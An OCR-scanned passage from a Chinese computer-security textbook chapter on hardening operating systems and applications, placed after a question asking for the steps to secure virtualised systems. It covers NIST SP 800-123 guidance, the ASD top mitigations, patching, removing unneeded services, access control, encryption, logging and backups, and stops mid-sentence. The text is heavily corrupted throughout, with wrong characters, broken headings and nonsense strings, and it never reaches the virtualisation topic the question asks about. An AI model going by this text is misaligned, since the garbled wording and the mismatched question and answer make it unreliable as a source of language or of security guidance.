列 出 在 虚拟 化 系统 中 维护 安全 所 需 的 步骤 。 





在 大 多 数组 织 中 ， 计 算 机 客户 疹 和 服务 大 系统 是 IT 基础 设施 的 中 心 组 件 。 服 务 需 问 存 储 
了 该 组 织 的 数据 和 应 用 ， 客 户 端 系 统 可 以 对 这 些 数据 和 应 用 进行 访问 。 然 而 ， 正 如 在 第 6 草 和 
前 面 两 草 所 讨论 的 ， 大 多 数 大 规模 软件 系统 几乎 都 存在 一 些 安全 漏洞 。 尽 管 这 些 漏洞 仅仅 是 预 
期 存在 的 ， 我们 通常 也 有 必要 对 这 些 软件 的 安装 和 运行 进行 管理 以 提供 合适 的 安全 等 级 。 在 某 
些 情形 下 ， 我们 可 以 使 用 经 过 专门 设计 和 评估 的 系统 来 保证 安全 性 。 我 们 将 在 第 27 章 探 讨 这 
种 可 能 性 。 

在 本 章 中 ,我 们 主要 讨论 怎样 以 加固 (hardening) 的 方式 来 保证 系统 安全 ， 这 个 加 固 的 过 
程 包括 操作 系统 和 关键 应 用 程序 的 规划 、 安 装 、 配 置 、 更 新 和 维护 。 这 些 方 法 在 NIST SP 800- 
123 (通用 服务 器 安全 指南 ，2008 年 7 月 ) 中 有 详细 论述 。 我 们 首先 在 一 般 意 义 上 介绍 操作 系 
统 和 关键 应 用 系统 的 加 固 过 程 ， 随 后 再 讨论 与 Linux 系统 和 Windows 系统 相关 的 特定 方面 。 
最 后 ， 会 讨论 一 下 虚拟 化 系统 的 加 固 ， 其 中 虚拟 化 系统 指 的 是 多 个 虚拟 机 运行 在 同一 台 物 理 主 
机 上 的 情形 。 

如 图 12-1 所 示 ， 我 们 将 一 个 系统 看 作 由 奉 干 层 组 成 ，| 
物理 硬件 位 于 最 底层 ; 在 它 上 面 是 操作 系统 ， 包 含 拥 有 特权 | 
的 内 核 代码 、API 和 服务 ， 最 项 层 是 用 户 应 用 程序 和 实用 组 | | 
件 。 这 张 图 也 展示 了 BIOS 和 其 他 代码 的 存在 。 这 里 的 其 他 一 m : 
代码 指 的 是 在 操作 系统 内 核 的 外 部 ， 对 于 操作 系统 内 核 来 说 ET 各 重生 生生 个 全 
是 不 可 见 的 ， 但 是 在 系统 启动 和 控制 底层 硬件 过 程 中 使 用 的 代码 。 这 些 层 中 的 每 一 层 代 码 都 需 
要 适当 的 加 国 〈hardening) 措施 来 提供 合适 的 安全 服务 。 由 于 每 一 层 在 面 对 来 自 它 的 下 层 的 攻 
击 时 都 是 脆弱 的 ， 因 此 只 对 底层 进行 适当 的 加 固 是 不 够 的 。 

许多 报告 指出 ， 使 用 少量 的 基本 加 固 措施 就 能 抵御 大 量 近 几 年 已 知 的 攻击 。 上 自从 2010 年 
澳大利亚 信号 局 (Australian Signals Directorate, ASD) 给 出 “35 条 缓解 策略 ”(Top 35 Mitigate 
Strategies) DIK, RH ASD 的 调查 发 现 ， 仅 仅 实施 这 些 策 略 的 前 四 条 ， 就 可 以 阻止 至 少 85% 
的 有 目标 的 网 络 人 入侵。 因此， 从 2013 年 开始 ， 这 前 四 条 策略 成 为 澳大利亚 所 有 政府 组 织 的 强 
制 策略 。 这 四 条 策略 是 : 
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1. 日 名 单 许可 的 应 用 。 

2. 给 第 三 方 应 用 和 操作 系统 漏洞 打 补 丁 。 

3. 修补 操作 系统 漏洞 ， 并 使 用 最 新 版 本 。 

4. 限制 管理 员 的 权限 。 

上 述 这 些 策略 都 有 助 于 建立 一 个 深入 的 防御 系统 。 在 本 章 中 ， 我 们 会 讨论 这 四 条 以 及 其 他 
ASD 列表 上 的 策略 。 需 要 注意 的 是 ， 这 些 策 略 大 部 分 可 以 在 由 美国 国土 安全 部 (DHS)、 美 国 
国家 安全 局 (NSA)、 美 国 能 源 部 、 美 国 系统 网 络 安全 协会 (SANS) 以 及 美国 其 他 部 门 共同 发 
布 的 “20 条 关键 控制 ”( 20 Critical Control) 中 找到 。 


12.1 操作 系统 安全 简介 


正如 前 面 所 提 到 的 ， 在 大 多 数组 织 中 ,计算 机 客户 端 系统 和 服务 器 系统 是 IT 基础 设施 的 
中 心 组 件 ， 这 些 系 统 可 能 存储 了 关键 的 数据 和 应 用 ， 是 组 织 正 党 运转 的 必要 工具 。 据 此 ， 我 们 
需要 注意 操作 系统 和 应 用 可 能 存在 的 漏洞 ， 以 及 6.3 节 所 讲 的 针对 此 类 漏洞 的 蠕虫 扫描 。 避 免 
系统 在 能 安装 最 新 的 补丁 和 实施 其 他 加 固 措 施 之 前 ， 在 安装 过 程 中 被 破坏 掉 。 因 此 ， 在 构建 和 
部 署 一 个 系统 时 就 应 该 有 一 个 预案 ， 以 应 对 这 类 威胁 ， 并 在 运行 生命 期 内 维护 系统 安全 。 

NIST SP 800-123 指出 ， 这 个 过 程 必须 : 

o 评估 风险 和 规划 系统 部 署 ; 

© 加 固 系统 底层 的 操作 系统 和 关键 应 用 程序 ; 

e 确保 任何 关键 内 容 是 安全 的 ; 

© 确保 使 用 了 合适 的 网 络 保护 机 制 ; 

© 确保 应 用 了 合适 的 流程 保证 系统 安全 。 
我 们 在 第 9 章 已 经 给 出 了 网 络 保护 机 制 的 可 选 方案 ， 因 此 在 本 章 我 们 将 讨论 其 余 几 项 
内 容 。 


12.2 ”系统 安全 规划 


部 署 新 系统 的 第 一 步 是 规划 。 仔 细 的 规划 将 有 助 于 确保 新 系统 尽 可 能 地 安全 ， 并 能 遵从 所 
有 必要 的 策略 。 这 份 规划 应 该 在 对 该 组 织 的 多 方面 的 评估 基础 上 形成 ， 因 为 每 个 组 织 有 其 特定 
的 安全 需求 和 关注 点 。 我 们 将 在 第 14 章 和 第 15 章 讨论 更 为 宽泛 的 规划 过 程 。 

特定 系统 的 安装 规划 旨 在 以 最 小 的 代价 获得 最 大 化 的 安全 。 先 前 丰富 的 经 验 告 诉 我 们 ， 与 
在 开始 部 署 的 过 程 中 规划 和 提供 安全 性 相 比 ， 在 后 期 “改造 ”(retro-fit) 安全 性 会 更 加 困难 和 兄 
贵 。 在 规划 期 间 要 确定 系统 的 安全 需求 、 它 的 应 用 和 数据 以 及 系统 的 用 户 。 随 后 ， 这 些 内 容 会 
指导 对 操作 系统 和 应 用 所 需 软 件 的 选取 ， 也 会 指导 确定 合适 的 用 户 配 置 和 访问 控制 设置 ， 男 外 
也 有 助 于 其 他 加 固 措施 的 选择 。 这 份 规划 还 需要 确定 合适 的 人 员 来 安装 和 管理 系统 ， 指 明 必 需 
的 相关 技能 以 及 所 需 的 培训 。 

NIST SP 800-123 列 出 了 在 系统 安全 规划 期 间 应 该 考虑 的 内 容 。 尽 管 它 所 关注 的 是 安全 服 
务 咒 的 部 署 ， 但 它 列 出 的 相关 内 容 也 非常 适用 于 客户 端 系 统 的 设计 。 这 些 内 容 包 括 以 下 方面 的 
考虑 : 

e 系统 的 目的 、 存 储 的 信息 类 型 、 提 供 的 应 用 和 服务 以 及 它们 的 安全 需求 。 
系统 用 户 的 分 类 、 他 们 拥有 的 权限 ， 以 及 他 们 能 够 访问 的 信息 类 型 。 
用 户 怎样 获得 认证 。 
以 什么 方式 访问 系统 内 的 信息 应 该 被 监管 。 
系统 对 存储 在 其 他 主机 ， 如 文件 服务 器 或 数据 库 服务 器 上 的 信息 可 进行 什么 访问 ”对 
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这 些 访 问 怎样 进行 管理 ? 

© 谁 来 管理 系统 ， 他 们 将 以 什么 方式 管理 系统 (本 地 或 远程 访问 ) ? 

o 系统 需要 的 其 他 附加 安全 措施 ， 包 括 主 机 防火 墙 、 反 病毒 软件 或 其 他 恶意 代码 防护 机 
制 ， 以 及 日 志 。 


12.3 操作 系统 加 固 


保证 系统 安全 的 第 一 个 关键 步骤 就 是 加 固 所 有 应 用 和 服务 所 依赖 的 基本 操作 系统 。 一 个 正 
确 安 装 、 打 好 补丁 、 恰 当 配 置 的 操作 系统 是 良好 安全 性 的 基础 。 不 幸 的 是 ， 许 多 操作 系统 的 默 
认 配 置 通常 着 眼 于 让 使 用 最 为 便利 ， 而 并 非 让 系统 最 为 安全 。 更 重要 的 是 ， 因 为 每 个 组 织 都 有 
其 自身 的 安全 需求 ， 所 以 配置 也 会 随 着 组 织 的 不 同 而 不 同 。 正 如 我 们 刚刚 讨论 的 ， 一 个 特定 的 
系统 需要 哪些 东西 应 该 在 规划 阶段 确认 。 

尽管 保证 每 个 特定 操作 系统 安全 的 细节 各 不 相同 ,但 广义 上 的 方法 却 是 类 似 的 。 针 对 大 多 
数 和 常见 操作 系统 的 安全 配置 手册 和 检查 清单 是 存在 的 ， 虽 然 这 些 手 册 和 清单 常常 因 每 个 组 织 和 
它们 的 系统 的 特殊 需求 而 变化 ， 但 依然 应 该 值得 去 参考 。 在 一 些 案例 中 ， 目 动 化 工具 也 有 可 能 
被 用 来 协助 加 固 系统 配置 工作 。 

在 加 固 操作 系统 的 过 程 中 ，NIST SP 800-123 建议 了 以 下 几 条 基本 步骤 : 

© 安装 操作 系统 并 打 补 丁 。 

e 通过 以 下 几 点 来 加 固 和 配置 操作 系统 以 充分 解决 已 确认 的 安全 需求 : 

n 移 除 不 需要 的 服务 、 应 用 、 协 议 。 
e 配置 用 户 、 组 以 及 权限 。 
e 配置 资源 控制 。 
e 安装 和 配置 额外 的 安全 控制 工具 ， 如 反 病 毒 软件 、 基 于 主机 的 防火 墙 、 入 侵 检 测 系 统 
(如 果 需 要 的 话 )。 
© 测试 基本 操作 系统 的 安全 性 ， 确 保 以 上 步骤 充分 满足 了 安全 需求 。 


12.3.1 操作 系统 安装 : 初始 安装 和 补丁 安装 


系统 安全 从 操作 系统 的 安装 开始 。 正 如 我 们 已 经 提 到 的 ， 一 个 有 网 络 连接 的 没 打 补丁 的 
系统 ， 在 它 的 安装 和 继续 使 用 阶段 是 脆弱 的 。 因 此 在 这 个 脆弱 阶段 ， 系 统 不 被 暴露 是 十 分 重要 
的 。 理 想 情况 下 ， 新 系统 应 该 在 一 个 受 保护 的 网 络 环境 中 来 搭建 。 这 个 网 络 可 以 是 一 个 完全 
独立 的 网 络 ， 操 作 系 统 镜像 和 所 有 的 可 用 补丁 包 通 过 可 移动 的 媒介 传输 到 上 面 ， 这 些 可 移动 
的 媒介 包括 DVD 或 者 USB 驱动 程序 。 正 如 我 们 在 第 6 章 所 言 ， 恶 意 代 码 可 以 通过 可 移动 设 
备 进 行 传播 ， 因 此 ， 我们 也 要 留心 确保 这 里 使 用 的 媒介 没有 被 感染 。 这 个 网 络 也 可 以 是 一 个 
访问 受 限 的 广域网 。 理 想 情 况 下 ， 系 统 应 该 没有 人 站 (inbound) 的 访问 权限 ,仅仅 有 几 条 出 站 
(outbound) 的 访问 权限 ， 用 来 连接 到 系统 安装 和 打 补 丁 所 需要 的 关键 站 点 。 无 论 何 种 情况 ,全 
部 的 安装 和 加 固 过 程 应 该 在 系统 部 署 到 易 访 问 且 脆弱 的 位 置 之 前 完成 。 

初始 安装 应 该 仅 安 装 系统 所 需 的 最 少 组 成 部 分 ， 并 且 仅 安装 系统 所 需 功能 的 相关 软件 包 。 
我 们 稍 后 会 探讨 最 少 软 件 包 的 合理 性 问题 。 

系统 的 整体 引导 过 程 也 应 该 加 固 。 这 可 能 需要 在 系统 初始 引导 时 打开 某 些 BIOS 选项 ， 或 
者 设 定 一 个 BIOS 更 改 密码 。 另 外 ， 可 能 还 需要 限制 可 以 引导 系统 开机 的 设备 。 正 如 我 们 在 
6.8 节 讨 论 的 ， 这 对 阻止 攻击 者 通过 改变 开机 引导 过 程 来 安装 一 个 管理 软件 十 分 重要 ， 也 可 以 
阻止 其 通过 改变 引导 设备 来 绕 过 正常 的 系统 访问 控制 进而 访问 到 本 地 数据 。 我 们 随后 也 会 讲 
到 ， 加 密 文件 系统 的 使 用 也 可 以 应 对 这 类 威胁 。 
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在 随后 安装 任何 额外 设备 的 驱动 程序 时 也 应 该 十 分 小 心 ， 因 为 这 些 程序 通常 拥有 全 部 的 
内 核 访问 权限 ， 并 且 是 由 第 三 方 提供 的 。 这 些 驱 动 代码 的 完整 性 和 来 源 必须 经 过 仔细 验证 ， 以 
确保 其 拥有 较 高 的 信任 级 别 。 一 个 恶意 的 驱动 程序 可 以 绕 过 许多 安全 控制 来 安装 恶意 软件 ， 在 
6.8 节 讨 论 的 蓝 色 药丸 ( Blue Pill demonstration rootkit)， 以 及 在 6.3 节 讨 论 的 震 网 蠕虫 (Stuxnet 
worm) 都 属于 此 类 情况 。 

考虑 到 操作 系统 和 应 用 中 常见 软件 相关 漏洞 和 其 他 漏洞 会 不 断 被 发 现 ， 因 此 系统 尽 可 能 保 
持 最 新 并 安装 与 安全 相关 的 补丁 包 也 是 十 分 关键 的 。 事 实 上 ， 这 样 做 也 是 符合 我 们 先前 提 到 的 
ASD 四 大 安全 策略 之 一 的 。 几 乎 所 有 和 负 用 的 系统 现在 都 提供 目 动 下 载 和 安 半 安全 更 新 的 功能 . 
这 些 补 丁 一 旦 可 用 ， 应 该 以 最 快 的 速度 安装 到 系统 中 ， 

在 变更 可 控 ( change-controlled) 的 系统 上 ， 我 们 总 会 有 这 种 感觉 ， 即 运行 目 动 更 新 是 不 
好 的 ; 因为 安全 补丁 可 能 会 引起 系统 的 不 稳定 ， 昌 然 这 种 情况 比较 少见 但 的 确 出 现 过 。 可 是 
ASD 强调 ， 测 试 补丁 所 产生 的 延迟 会 以 让 系统 处 于 易 受 攻击 状态 来 作为 妥协 ， 而 且 他 们 认为 
目 动 更 新 是 可 取 的 。 对 于 可 用 性 和 正常 运行 时 间 至 关 重 要 的 系统 而 言 ， 在 将 补丁 部 团 到 生产 环 
境 之 前 ， 你 可 能 需要 对 测试 系统 上 的 所 有 补丁 进行 部 署 和 认证 。 并 且 ， 这 个 过 程 应 做 到 尽 可 能 
及 时 。 


12.3.2 移 除 不 必要 的 服务 、 应 用 和 协议 


运行 在 系统 上 的 任何 软件 包 都 可 能 包含 漏洞 ， 所 以 可 以 运行 的 软件 包 越 少 ， 系 统 的 安全 风 
险 就 越 小 。 很 明显 ， 在 可 用 性 、 提 供 某 时 刻 所 需 的 全 部 软件 、 安 全 性 和 限制 软件 安装 数量 之 间 
存在 着 一 个 权衡 问题 。 不 同 组 织 之 间 ， 同 一 组 织 的 不 同系 统 之 间 所 需 的 服务 、 应 用 、 协 议 存在 
着 极 大 的 差别 。 因 此 在 系统 规划 阶段 应 该 明确 某 一 特定 系统 真正 需要 的 东西 ， 以 便 在 提供 合适 
的 功能 的 同时 ， 删 除 不 需要 的 软件 来 改善 安全 性 。 

大 多 数 分 布 式 系统 的 默认 配置 是 让 使 用 尽 可 能 便利 ， 而 并 非 系 统 尽 可 能 安全 。 因 此 ， 当 运 
行 初始 安装 的 时 修 ， 不 应 该 使 用 系统 给 出 的 默认 安装 选项 ， 而 应 该 选择 个 性 化 安装 以 确保 仅 安 
装 需 要 的 软件 。 如 果 在 随后 的 使 用 中 需要 其 他 的 软件 ， 那 么 到 时 候 再 按 需 安装 。NIST SP 800- 
123 和 其 他 的 安全 加 固 指导 都 给 出 了 不 需要 安装 的 服务 、 应 用 和 协议 的 列表 。 

NIST SP 800-123 也 强烈 建议 不 安装 不 需要 的 软件 ， 而 并 非 先 安装 再 印 载 或 者 禁用 。 他 们 
持 这 种 观点 是 因为 他 们 发 现 许多 秋 载 脚本 并 不 能 完全 删除 软件 包 的 所 有 组 件 。 他 们 也 注意 到 禁 
用 一 项 服务 意味 着 仅 当 攻击 开始 的 时 候 该 服务 是 不 可 用 的 ， 如 果 攻 击 者 成 功 获 取 了 访问 系统 的 
某 些 权限 ， 那 么 被 禁用 的 软件 有 可 能 被 重新 启用 来 进一步 破坏 系统 。 所 以 对 于 安全 性 来 说 ， 最 
好 的 办 法 就 是 根本 不 安装 不 需要 的 软件 ， 这 样 软件 被 攻击 者 利用 就 无 从 谈 起 了 . 


12.3.3 配置 用 户 、 组 和 认证 


并 非 所 有 可 以 访问 系统 的 用 户 对 系统 内 的 数据 和 资源 都 拥有 相同 的 访问 权限 。 正 如 我 们 在 
第 4 章 所 讨论 的 ， 所 有 现代 操作 系统 都 实现 了 对 数据 和 资源 的 访问 控制 。 几 乎 所 有 的 系统 都 提 
供 茶 些 形式 的 访问 控制 。 有 一 些 系统 也 可 能 提供 基于 角色 的 或 者 强制 的 访问 控制 机 制 。 

系统 规划 阶段 应 该 考虑 系统 用 户 的 分 类 、 他 们 各 自 拥有 的 权限 、 他 们 访问 信息 的 类 型 ， 以 
及 他 们 在 哪里 定义 和 认证 。 一 些 用 户 可 以 通过 提升 权限 来 管理 系统 ; 其 他 一 些 人 就 是 普通 用 
户 ， 对 于 所 需 的 文件 和 数据 拥有 适当 的 访问 权 ; 也 可 能 有 一 些 来 宾 账 户 ， 拥 有 十 分 有 限 的 访问 
权限 。 四 条 ASD 关键 策略 的 最 后 一 条 就 是 限制 提升 权限 ， 仅 仅 将 提升 权限 的 功能 开放 给 那些 
需要 的 人 。 而 且 ， 这 些 人 应 该 在 运行 需要 高 级 权限 的 任务 时 再 提升 权限 ， 而 在 其 他 时 候 以 普通 
用 户 的 身份 来 访问 系统 。 这 样 一 来 ， 攻 击 者 只 有 很 少 的 机 会 利用 特权 用 户 的 行为 来 攻击 系统 ， 
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从 而 改善 系统 的 安全 性 。 一 些 操作 系统 也 提供 特殊 的 工具 和 访问 机 制 来 协助 管理 员 在 必要 时 提 
升 自 己 的 权限 ， 并 对 这 些 行为 进行 适当 的 记录 。 

一 个 关键 的 决策 是 用 户 、 用 户 所 属 的 组 以 及 他 们 的 认证 方式 在 本 地 系统 被 指定 还 是 使 用 一 
个 中 央 认 证 服务 硕 。 不 论 选择 哪 一 种 ， 都 会 在 系统 中 有 详细 的 配置 。 

同样 在 这 个 阶段 ， 包 括 在 系统 安装 过 程 中 的 任何 默认 账户 都 应 该 被 加 固 。 那 些 不 需要 的 账 
户 或 者 删除 掉 ， 或 者 至 少 应 该 被 禁用 。 不 同 的 管理 服务 系统 账户 应 该 设 定 完 好 ， 确 保 他 们 不 能 
互相 登录 。 另 外 ， 所 有 安装 过 程 中 的 默认 密码 都 应 该 被 更 改 以 确保 安全 。 

所 有 涉及 认证 证 书 ， 特 别 是 涉及 密码 安全 的 策略 都 应 该 进行 配置 。 这 包括 对 于 不 同 的 账户 
访问 方式 哪些 认证 方法 是 可 接受 的 ， 还 包括 密码 要 求 的 长 度 、 复 杂 度 、 时 效 。 我 们 在 第 3 章 讨 
论 了 这 些 话 题 的 部 分 内 容 。 


12.3.4 配置 资源 控制 


一 旦 确定 了 用 户 和 用 户 组 ， 就 应 该 在 数据 和 资源 上 设 定 合适 的 访问 权限 来 匹配 特定 的 安全 
策略 。 这 可 能 会 限制 某 些 用 户 运 行 某 些 程序 ， 特 别 是 修改 系统 状态 的 程序 ; 或 者 会 限制 那些 能 
污 写 某 些 特定 目录 树 的 用 户 。 许 多 安全 加 固 指导 都 给 出 了 对 默认 访问 配置 的 推荐 更 改 列表 以 改 
ETE. 


1235 ”安装 额外 的 安全 控制 工具 


安装 和 配置 额外 的 安全 工具 ， 比 如 反 病 毒 软件 、 基 于 主机 的 防火 墙 、IDS 或 IPS 软件 或 
者 应 用 程序 白 名 单 等 ， 可 能 会 进一步 地 改善 安全 性 。 这 些 工 具 的 其 中 一 些 可 能 会 作为 操作 
系统 的 一 部 分 被 安装 , 但 是 默认 状态 下 不 会 被 启用 。 其 他 的 则 是 需要 获取 和 使 用 的 第 三 方 
产品 。 

正如 我 们 在 第 6 章 讨 论 的 ， 考 虑 到 恶意 软件 的 广泛 流行 ， 合适 的 反 病毒 软件 (能 应 对 广泛 
的 病毒 类 型 ) 是 许多 系统 上 的 重要 安全 组 件 。 反 病毒 产品 传统 上 是 应 用 在 Windows 系统 中 的 ， 
这 是 因为 Windows 系统 的 广泛 应 用 使 它 成 为 攻击 者 的 首选 目标 。 然 而 ， 随 着 其 他 平台 的 使 用 
At, 特别 是 智能 手机 的 使 用 量 的 增长 ,使 得 更 多 的 病毒 针对 它们 而 开发 。 因 此 在 任何 系统 中 ， 
反 病 毒 产品 者 应 该 被 当 作 安全 防御 体系 的 一 部 分 。 

基于 主机 的 防火 墙 、IDS 和 IPS 软件 也 可 以 通过 限制 系统 上 的 远程 网 络 访问 来 改善 安全 
性 。 如 果 一 项 服务 本 地 可 以 访问 ， 而 远程 访问 是 不 需要 的 ， 那 么 这 种 限制 会 有 助 于 保证 系统 的 
安全 ， 以 防止 攻击 者 远程 利用 该 服务 。 传 统 上 ， 防 火 墙 通过 端口 和 协议 来 限制 某 些 或 全 部 的 外 
部 访问 。 一些 防火 墙 也 可 以 配置 成 允许 来 自 系统 或 到 指定 程序 的 访问 ， 这 可 以 进一步 限制 攻击 
者 ,阻止 其 安装 和 访问 其 自己 的 恶意 软件 。IDS 或 IPS 软件 可 能 会 包括 额外 的 机 制 ， 比 如 流量 
监控 或 者 文件 完整 性 检查 来 识别 甚至 应 对 某 些 类 别 的 攻击 。 

其 他 的 额外 工具 还 包括 白 名 单 。 这 限制 了 系统 中 能 运行 的 程序 ， 仅 仅 在 名 单 上 显 式 列 出 的 
程序 才 可 以 运行 。 这 种 工具 可 以 阻止 攻击 者 安装 和 运行 目 己 的 恶意 软件 ， 并 且 这 也 是 ASD 四 
项 策略 中 的 第 一 个 。 尽 管 这 种 方法 可 以 提高 安全 性 ， 并 且 在 一 个 用 户 需 求 可 预测 的 环境 中 表 
现 极 佳 ， 但 是 任何 软件 使 用 的 改变 都 会 导致 配置 的 改变 ， 这 会 引起 IT 支持 部 门 工作 量 的 增加 。 
需要 注意 的 是 ， 并 非 所 有 的 组 织 或 所 有 的 系统 都 适合 使 用 这 种 工具 。 


12.3.6 ”测试 系统 安全 性 


加 固 基 本 操作 系统 的 最 后 一 步 就 是 安全 性 测试 。 其 目标 是 确保 先前 的 安全 配置 都 正确 实施 
T, 并 且 能 够 识别 应 该 被 修正 或 者 管理 的 任何 淤 在 漏洞 。 
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许多 安全 加 固 指导 都 包含 了 合适 的 检查 清单 。 也 有 经 过 专门 设计 的 程序 用 来 检查 系统 以 确 
保 系 统 符合 基本 的 安全 需求 ， 并 且 扫 描 已 知 的 漏洞 和 薄弱 的 配置 。 这 些 工作 应 该 在 系统 的 初始 
加 固 后 完成 ， 随 后 在 系统 的 安全 维护 过 程 中 周期 性 地 重复 。 


124 ”应 用 安全 


一 旦 基本 操作 系统 安装 和 加 固 完 毕 ， 接 下 来 就 要 安装 和 配置 所 需 的 服务 和 应 用 了 。 这 个 
过 程 与 先前 给 出 的 操作 系统 加 固 过 程 极其 相似 。 需 要 注意 的 是 ， 与 基本 操作 系统 类 似 ， 即 我 们 
应 仅 安装 能 满足 功能 需求 的 软件 以 尽 可 能 减少 漏洞 。 在 客户 端 系统 中 ， 如 Java, PDF 阅读 器 、 
Flash, IAN AAF, Microsoft Office 这 些 软件 都 是 已 知 且 需 要 加 固 的 对 象 。 在 服务 器 系统 中 ， 
包括 网 页 、 数 据 库 、 文 件 访问 服务 器 在 内 的 能 够 提供 远程 访问 的 软件 都 是 需要 特别 关注 的 ， 因 
为 攻击 者 很 有 可 能 利用 这 些 软件 来 获取 对 系统 的 远程 访问 。 

系统 中 每 一 项 选 定 的 服务 和 应 用 都 应 该 先 安 装 ， 随 后 打 好 最 新 的 补丁 。 这 些 补丁 可 能 由 操 
作 系 统 本 身 提供 ， 也 有 可 能 由 独立 的 第 三 方 软件 包 提 供 。 至 于 基本 操作 系统 的 安装 ， 最 好 使 用 
一 个 独立 的 经 过 安全 加 固 的 网 络 。 


12.4.1 应 用 配置 


接 下 来 就 是 对 每 个 应 用 进行 特定 的 配置 。 这 包括 为 应 用 创建 和 指定 合适 的 数据 存储 区 域 ， 
根据 情况 适当 改变 应 用 和 服务 的 默认 配置 。 

一 些 应 用 和 服务 可 能 包含 默认 的 数据 、 脚 本 或 用 户 账户 。 这 些 东 西 应 该 被 仔细 检查 ， 仅 仅 
在 确实 需要 的 情况 下 予以 保留 ， 并 且 做 适当 的 加 固 。 一 个 广为人知 的 例子 ， 就 是 在 Web 服务 
器 中 ,通常 存在 一 些 示例 脚本 ， 并 且 其 中 一 些 已 知 是 不 安全 的 。 这 些 脚本 香 不 经 过 安全 加 固 处 
理 则 应 该 予以 清除 。 

作为 配置 过 程 的 一 部 分 ， 应 该 仔细 考虑 应 用 所 具有 的 访问 权限 。 尤 其 是 像 Web 和 文件 传 
输 服务 这 样 的 远程 访问 服务 应 该 特别 注意 。 除 非 有 特别 的 需要 ， 和 否则 这 种 服务 不 应 该 拥有 修改 
文件 的 权限 。 在 Web 和 文件 传输 服务 中 ， 一 个 常见 的 配置 错误 就 是 对 于 该 服务 下 的 所 有 文件 ， 
服务 咒 都 拥有 执行 权限 。 这 样 做 的 后 果 ， 就 是 攻击 者 可 以 利用 某 些 软件 或 脚本 漏洞 ， 对 这 些 文 
件 进 行 修改 。 大 量 的 Web 破坏 攻击 就 是 由 这 种 不 安全 的 配置 导致 的 。 通 过 确保 服务 器 对 大 多 
数 文件 只 能 读 、 不 能 写 ， 可 以 有 效 降低 出 现 这 类 攻击 的 风险 。 仅 对 于 那些 需要 修改 的 文件 ， 或 
是 需要 存储 上 传 的 数据 的 文件 ， 如 日 志 信 息 文件 等 ， 给 予 其 写 权 限 。 并 且 仅 将 这 种 权限 给 予 负 
责 维护 这 类 信息 的 用 户 。 


12.4.2 WEHR 


正如 我 们 在 第 2 章 和 第 四 、 五 部 分 所 讨论 的 ， 加 密 技 术 是 在 传输 和 存储 过 程 中 保护 数据 的 
关键 技术 。 如 果 在 系统 中 需要 使 用 这 类 技术 ， 那 么 应 该 正确 配置 它们 ， 并 且 生 成 合适 的 密 钥 ， 
签名 并 加 固 。 

如 果 使 用 了 安全 网 络 服务 ， 那 么 该 服务 很 有 可 能 是 采用 了 TLS 或 者 IPSec， 这 时 应 该 为 它 
们 生成 合适 的 公 钥 和 私 钥 。 正 如 我 们 在 23.2 节 讨 论 的 ， 随 后 会 由 认证 中 心 (CA) 来 创建 和 签 
发 X.509 证 书 ， 将 每 一 个 服务 身份 与 其 使 用 的 公 钥 相 关联 。 如 果 以 SSH 的 方式 提供 安全 的 远 
程 访问 服务 ， 那 么 应 该 构建 合适 的 服务 器 并 配置 客户 端 密 钥 。 

加 密 技 术 的 另外 一 种 应 用 是 加 密 文件 系统 。 如 果 想 用 这 种 系统 ， 就 应 该 创建 并 由 合适 的 密 
钥 保证 其 安全 。 
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12.5 ”安全 维护 


一 旦 系统 被 创建 ， 且 加 固 和 部 署 完毕 ， 那 接 下 来 就 是 维护 其 安全 的 过 程 了 。 环 境 的 实时 改 
变 ， 新 漏洞 的 不 断 发 现 ， 都 会 导致 系统 暴露 在 威胁 之 下 。NIST SP 800-123 建议 的 安全 维护 流 
程 包括 以 下 步 又 : 

e 监控 和 分 析 日 志 信 息 。 
定期 备份 。 

从 安全 损坏 中 恢复 。 

定期 测试 系统 安全 性 。 

使 用 合适 的 软件 维护 流程 来 更 新 所 有 的 关键 软件 并 安装 补丁 ， 同 时 根据 需要 监控 和 修 
改 相关 配置 。 

上 文 已 经 提 到 过 ， 如 果 有 可 能 ， 应 该 配置 自动 安装 补丁 和 更 新 ， 或 者 在 受 控 系 统 中 ， 人 
工 测 试 和 安装 补丁 。 另 外 ， 系 统 应 该 定期 使 用 检查 清单 和 自动 化 工具 进行 检查 。 我 们 将 在 17.4 
节 讨 论 突 发 事件 的 响应 过 程 。 下 面 介绍 关键 的 日 志和 备份 过 程 。 


12.5.1 Hs 


NIST SP 800-123 指出 ,“ 日 志 是 一 个 完善 的 安全 体系 的 基石 。” 日 志 是 一 个 仅 能 通知 你 发 
生 了 什么 坏事 的 反应 式 控制 。 但 是 高 效 的 日 志 有 助 于 确保 系统 出 现 漏洞 或 故障 后 ， 系 统管 理 员 
可 以 迅速 和 准确 地 定位 问题 并 且 高 效 地 整改 和 恢复 。 其 中 的 关键 在 于 确保 你 在 日 志 中 记录 了 正 
确 的 数据 ， 然 后 能 够 监控 和 分 析 这 些 数 据 。 日 志 信息 可 以 由 系统 、 网 络 以 及 应 用 来 生成 。 日 志 
信息 记录 的 范围 应 该 在 系统 规划 阶段 确定 好 ， 这 主要 取决 于 系统 的 安全 需求 和 服务 器 存储 的 信 
明敏 感 程度 。 

日 志 信 息 非 党 多 ， 因 此 为 它们 分 配 足够 的 空间 十 分 重要 。 另 外 也 应 该 配置 日 志 自 动 回 滚 
(automatic log rotation) 功能 和 存档 系统 来 辅助 管理 日 志 信息 所 使 用 的 整体 空间 。 

人 工分 析 日 志 是 极其 乏味 的 ， 并 且 十 分 不 可 靠 。 相 反 ， 使 用 某 些 形 式 的 自动 分 析 才 是 首 
选 ， 而 且 也 更 容易 发 现 异 常 活动 。 例 如 我 们 在 第 8 章 中 讨论 的 人 侵 检 测 系统 就 是 执行 这 样 的 自 
动 化 分 析 。 

我 们 将 在 第 18 章 深入 讨论 日 志 。 


12.5.2 ”数据 备份 和 存档 


定期 对 系统 进行 数据 备份 是 维护 系统 和 用 户 信息 完整 性 的 另 一 种 重要 方法 。 有 许多 因素 会 
导致 系统 中 的 信息 丢失 ， 包 括 硬件 和 软件 的 故障 、 突 发 的 或 蓄意 的 损坏 。 另 外 ， 对 于 数据 的 保 
留 也 可 能 有 法 律 或 业务 上 的 要 求 。 备 份 (backup) 指 的 是 定期 对 数据 进行 拷贝 的 过 程 ， 以 保证 
数据 在 丢失 或 者 损坏 后 ， 能 够 在 几 小 时 到 几 周 内 很 快 地 恢复 过 来 。 存 档 ( archive) 指 的 是 保存 
过 去 相当 长 的 一 段 时 间 内 ， 比 如 几 个 月 或 几 年 内 的 数据 拷贝 的 过 程 ， 这 是 为 了 符合 法 律 和 运营 
